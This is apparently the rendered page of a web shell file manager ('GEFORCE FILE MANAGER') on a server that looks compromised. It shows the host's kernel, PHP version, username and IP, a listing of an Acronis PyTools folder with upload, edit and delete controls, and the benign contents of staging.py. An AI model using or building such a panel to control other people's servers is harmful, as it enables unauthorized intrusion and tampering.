[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
lib
/
Acronis
/
PyTools
/
commands
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 __pycache__
SET
[ DEL ]
📄 auto_update.py
2,909 B
SET
[ EDIT ]
|
[ DEL ]
📄 protect.py
408 B
SET
[ EDIT ]
|
[ DEL ]
📄 retention.py
9,876 B
SET
[ EDIT ]
|
[ DEL ]
📄 retention_specs.py
1,284 B
SET
[ EDIT ]
|
[ DEL ]
📄 run_tool.py
817 B
SET
[ EDIT ]
|
[ DEL ]
📄 staging.py
732 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: staging.py
import acrort import acrobind.staging import logging def get_log_file(): return "" def configure_logging(): log_file = get_log_file() if log_file == "": return logger = logging.getLogger() file_log_handler = logging.FileHandler(log_file) logger.addHandler(file_log_handler) def run(*args, **kw): configure_logging() ctx = acrort.remoting.CommandContext(*args, **kw) return acrobind.staging.calculate_workflow_command(ctx.connection, ctx.argument) def calculate_backup_set(*args, **kw): configure_logging() ctx = acrort.remoting.CommandContext(*args, **kw) return acrobind.staging.calculate_backup_type_command(ctx.connection, ctx.argument)